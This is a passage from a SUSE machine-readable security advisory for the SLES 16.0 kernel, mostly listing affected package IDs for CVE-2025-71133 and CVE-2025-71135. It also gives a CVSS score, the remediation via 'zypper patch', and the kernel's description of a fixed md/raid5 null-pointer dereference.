"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
